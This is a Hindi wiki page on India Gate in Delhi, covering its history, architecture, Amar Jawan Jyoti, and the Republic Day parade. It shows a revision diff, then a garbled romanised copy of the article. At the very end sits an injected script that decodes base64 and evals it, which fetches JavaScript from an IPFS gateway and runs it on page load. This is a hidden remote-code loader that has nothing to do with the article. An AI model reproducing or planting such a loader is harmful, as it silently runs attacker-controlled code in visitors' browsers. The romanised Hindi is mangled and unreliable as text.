Difference between revisions of "इंडिया गेट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - " भारत " to " भारत ")
Line 22: Line 22:
 
 
  
भारतीय सेनाओं के शहीदों के लिए, जो फ्रांस और फ्लैंडर्स मेसोपोटामिया, फारस, पूर्वी अफ्रीका गैलीपोली और निकटपूर्व एवं सुदूरपूर्व की अन्य जगहों पर शहीद हुए, और उनकी पवित्र स्मृति में भी जिनके नाम दर्ज़ हैं और जो तीसरे अफ़ग़ान युद्ध में भारत में या उत्तर-पश्चिमी सीमा पर मृतक हुए।</blockquote>
+
भारतीय सेनाओं के शहीदों के लिए, जो फ्रांस और फ्लैंडर्स मेसोपोटामिया, फारस, पूर्वी अफ्रीका गैलीपोली और निकटपूर्व एवं सुदूरपूर्व की अन्य जगहों पर शहीद हुए, और उनकी पवित्र स्मृति में भी जिनके नाम दर्ज़ हैं और जो तीसरे अफ़ग़ान युद्ध में [[भारत]] में या उत्तर-पश्चिमी सीमा पर मृतक हुए।</blockquote>
  
 
==अमर जवान ज्‍योति==
 
==अमर जवान ज्‍योति==
Line 30: Line 30:
 
इसके आस पास हरे भरे मैदान, बच्‍चों का उद्यान और प्रसिद्ध बोट क्‍लब इसे एक उपयुक्‍त पिकनिक स्‍थल बनाते हैं। इंडिया गेट के फव्‍वारे के पास बहती शाम की ठण्डी हवा ढेर सारे दर्शकों को यहां आकर्षित करती हैं। शाम के समय इंडिया गेट के चारों ओर लगी रोशनियों से इसे प्रकाशमान किया जाता है जिससे एक भव्‍य दृश्‍य बनता है। स्‍मारक के पास खड़े होकर [[राष्‍ट्रपति भवन]] का नज़ारा लिया जा सकता है। सुंदरतापूर्वक रोशनी से भरे हुए इस स्‍मारक के पीछे काला होता आकाश इसे एक यादगार पृष्‍ठभूमि प्रदान करता है। दिन के प्रकाश में भी इंडिया गेट और राष्‍ट्रपति भवन के बीच एक मनोहारी दृश्‍य दिखाई देता है।
 
इसके आस पास हरे भरे मैदान, बच्‍चों का उद्यान और प्रसिद्ध बोट क्‍लब इसे एक उपयुक्‍त पिकनिक स्‍थल बनाते हैं। इंडिया गेट के फव्‍वारे के पास बहती शाम की ठण्डी हवा ढेर सारे दर्शकों को यहां आकर्षित करती हैं। शाम के समय इंडिया गेट के चारों ओर लगी रोशनियों से इसे प्रकाशमान किया जाता है जिससे एक भव्‍य दृश्‍य बनता है। स्‍मारक के पास खड़े होकर [[राष्‍ट्रपति भवन]] का नज़ारा लिया जा सकता है। सुंदरतापूर्वक रोशनी से भरे हुए इस स्‍मारक के पीछे काला होता आकाश इसे एक यादगार पृष्‍ठभूमि प्रदान करता है। दिन के प्रकाश में भी इंडिया गेट और राष्‍ट्रपति भवन के बीच एक मनोहारी दृश्‍य दिखाई देता है।
 
==गणतंत्र दिवस परेड==
 
==गणतंत्र दिवस परेड==
हर वर्ष 26 जनवरी को इंडिया गेट गणतंत्र दिवस की परेड का गवाह बनता है जहां आधुनिकतम रक्षा प्रौद्योगिकी के उन्‍नयन का प्रदर्शन किया जाता है। यहां आयोजित की जाने वाली परेड भारत देश की रंगीन और विविध सांस्‍कृतिक विरासत की झलक भी दिखाती है, जिसमें देश भर से आए हुए कलाकार इस अवसर पर अपनी कला का प्रदर्शन करते हैं।
+
हर वर्ष 26 जनवरी को इंडिया गेट गणतंत्र दिवस की परेड का गवाह बनता है जहां आधुनिकतम रक्षा प्रौद्योगिकी के उन्‍नयन का प्रदर्शन किया जाता है। यहां आयोजित की जाने वाली परेड [[भारत]] देश की रंगीन और विविध सांस्‍कृतिक विरासत की झलक भी दिखाती है, जिसमें देश भर से आए हुए कलाकार इस अवसर पर अपनी कला का प्रदर्शन करते हैं।
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=

Revision as of 09:36, 20 September 2010

[[chitr:India-gate.jpg|iandiya get, dilli
India Gate, Delhi|thumb]] yamuna nadi ke kinare sthit dilli shahar bharat ki rajadhani hai jo prachin aur gatishil itihas ke sath ek chamakadar adhunik shahar hai. is shahar mean bahupakshiy sansh‍kriti hai jo poore rashh‍tr ka ek laghu brahmaand kaha ja sakata hai. is shahar mean ek sath do anokhe anubhav hote haian-

  • nee dilh‍li apani chau di s dakoan aur ooanchi imaratoan ke sath ek samakalin shahar hone ka anubhav karata hai jabaki
  • purani dilh‍li ki s dakoan par chalate hue ap ek purane yug ka najara le sakate haian, jahaan tang galiyaan aur purani haveliyaan dekhaee deti haian. dilh‍li mean hazaroan purane aitihasik sh‍marak aur dharmik mahath‍v ke sh‍than haian.
  • iandiya get dilli ke rajapath par sthit hai.

nirman

  • dilli ke mahath‍vapoorn sh‍marak, iandiya get ko 80,000 se adhik bharatiy sainikoan ki yad mean nirmit kiya gaya tha jinh‍hoanne pratham vishh‍vayuddh mean viragati paee thi.
  1. pratham vishv yuddh aur afagan yuddh mean mare ge bharatiy javanoan ki yad mean 1931 mean banakar taiyar hua.
  2. yah sh‍marak 42 mitar ooanchi arch se sajjit hai.
  3. ise prasiddh vash‍tukar 'edavin lh‍yootiyanh‍s' ne dijain kiya tha. iandiya get ko pahale akhil bharatiy yuddh sh‍mriti ke nam se jana jata tha.
  4. iandiya get ki dijain isake phraansisi pratiroop 'sh‍marak ark - di - trayomh‍ph' ke saman hai.

vastukala

[[chitr:India-Gate-Delhi.jpg|iandiya get, dilli
India Gate, Delhi|thumb]] yah imarat lal path‍thar se bani haian jo ek vishal dhaanche ke manch par kh di hai. isake arch ke oopar donoan or 'iandiya' likha hai. isake divaroan par 70,000 se adhik bharatiy sainikoan ke nam shilpit kie ge haian, jinaki yad mean ise banaya gaya hai. isake shirsh par uthala golakar baulanuma akar hai jise vishesh avasaroan par jalate hue tel se bharane ke lie banaya gaya tha.

  • shahid sainikoan ki smriti mean yahaan ek raifal ke oopar sainik ki topi rakhi gayi hai jisake char konoan par sadaiv 'amar javan jyoti' jalati rahati hai. isaki divaroan par un hazaroan shahid sainikoan ke nam haian. sabase oopar aangrezi mean likha hai-

To the dead of the Indian armies who fell honoured in France and Flanders Mesopotamia and Persia East Africa Gallipoli and elsewhere in the near and the far-east and in sacred memory also of those whose names are recorded and who fell in India or the north-west frontier and during the Third Afgan War.



bharatiy senaoan ke shahidoan ke lie, jo phraans aur phlaiandars mesopotamiya, pharas, poorvi aphrika gailipoli aur nikatapoorv evan sudoorapoorv ki any jagahoan par shahid hue, aur unaki pavitr smriti mean bhi jinake nam darz haian aur jo tisare afagan yuddh mean bharat mean ya uttar-pashchimi sima par mritak hue.

amar javan jh‍yoti

iandiya get ke bes par ek anh‍y sh‍marak, amar javan jh‍yoti hai, jise sh‍vatantrata ke bad jo da gaya tha. yahaan nirantar ek jh‍vala jalati hai jo un aanjan sainikoan ki yad mean hai jinh‍hoanne is rashh‍tr ki seva mean apana jivan samarpit kar diya.

bot kh‍lab

isake as pas hare bhare maidan, bachh‍choan ka udyan aur prasiddh bot kh‍lab ise ek upayukh‍t pikanik sh‍thal banate haian. iandiya get ke phavh‍vare ke pas bahati sham ki thandi hava dher sare darshakoan ko yahaan akarshit karati haian. sham ke samay iandiya get ke charoan or lagi roshaniyoan se ise prakashaman kiya jata hai jisase ek bhavh‍y drishh‍y banata hai. sh‍marak ke pas kh de hokar rashh‍trapati bhavan ka nazara liya ja sakata hai. suandaratapoorvak roshani se bhare hue is sh‍marak ke pichhe kala hota akash ise ek yadagar prishh‍thabhoomi pradan karata hai. din ke prakash mean bhi iandiya get aur rashh‍trapati bhavan ke bich ek manohari drishh‍y dikhaee deta hai.

ganatantr divas pared

har varsh 26 janavari ko iandiya get ganatantr divas ki pared ka gavah banata hai jahaan adhunikatam raksha praudyogiki ke unh‍nayan ka pradarshan kiya jata hai. yahaan ayojit ki jane vali pared bharat desh ki rangin aur vividh saansh‍kritik virasat ki jhalak bhi dikhati hai, jisamean desh bhar se ae hue kalakar is avasar par apani kala ka pradarshan karate haian.

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>